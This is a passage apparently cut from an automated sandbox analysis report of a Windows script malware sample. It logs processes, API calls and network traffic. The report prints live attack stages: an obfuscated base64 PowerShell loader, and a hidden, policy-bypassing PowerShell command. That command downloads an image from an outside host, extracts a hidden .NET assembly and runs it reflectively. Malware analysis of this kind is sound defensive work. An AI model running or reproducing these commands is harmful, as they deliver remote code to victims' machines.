ce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" filepath: powershell	1	1
CreateProcessInternalW Oct. 26, 2023, 5:18 p.m.	thread_identifier: 2104 thread_handle: 0x000002a4 process_identifier: 2228 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\.vbs)) { Copy-Item -Path .vbs -Destination C:\Windows\Temp\regasm.vbs -Force } filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000330	1	1
ShellExecuteExW Oct. 26, 2023, 5:18 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\.vbs)) { Copy-Item -Path .vbs -Destination C:\Windows\Temp\regasm.vbs -Force } filepath: powershell.exe	1	1
CreateProcessInternalW Oct. 26, 2023, 5:18 p.m.	thread_identifier: 2484 thread_handle: 0x00000438 process_identifier: 2476 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc'))" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x0000043c	1	1

File has been identified by one AntiVirus engine on VirusTotal as malicious (1 event)

Kaspersky

HEUR:Trojan.Script.Generic

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 26, 2023, 5:18 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (11 events)

Data received	[
Data received	We: é OÓWãÁSñ¾ÀÇÇ»üÚÐ*üDOWNGRD Îd¬±9¼¬Häx)ÍVµ¶ÕÐ;±ZÀ ÿ
Data received	Q
Data received
Data received	Ab8¶RUÝs25ïðLb`ðö±®}ax1HBÌ1ßÙ¯!³«Ìæ ¡âÓß]MÅË$6ëÌcG0E!ÍÛ»]×¬Òfll¢éßcyÈð@vz ,®ß"h´Q»0x£lÒ©ÈQxÖåNrt
Data received
Data received
Data received
Data received
Data received	0
Data received	¾]½¾V\|J ÁdóàîSbýf8 Ö¿Ò;_Ï¾ :LNÛðþZ^xSDê

Poweshell is sending data to a remote host (2 events)

Data sent	yue: Ü§°ùFQ*ôôZ]äÍ\lö ®¥6:/5 ÀÀÀ À 284ÿuploaddeimagens.com.br
Data sent	FBA,.$Eôºáwá ÒcÜnê\|-4 °3Ýö¸µ4lïÃÌþÒêH&¾;v} 0&W~Í«?Æ0k0·¸ß^~ÿ²{VC9Øµ3m?²û¦}ïÓ Û÷ÖÊ"3y¨éÇzÉ°q

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Oct. 26, 2023, 5:18 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 26, 2023, 5:18 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 26, 2023, 5:18 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send Oct. 26, 2023, 5:18 p.m.	buffer: yue: Ü§°ùFQ*ôôZ]äÍ\lö ®¥6:/5 ÀÀÀ À 284ÿuploaddeimagens.com.br socket: 1424 sent: 126	1	126
send Oct. 26, 2023, 5:18 p.m.	buffer: FBA,.$Eôºáwá ÒcÜnê\|-4 °3Ýö¸µ4lïÃÌþÒêH&¾;v} 0&W~Í«?Æ0k0·¸ß^~ÿ²{VC9Øµ3m?²û¦}ïÓ Û÷ÖÊ"3y¨éÇzÉ°q socket: 1424 sent: 134	1	134
WSASend Oct. 26, 2023, 5:18 p.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 2012		0

One or more non-whitelisted processes were created (5 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc'))"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\.vbs)) { Copy-Item -Path .vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGt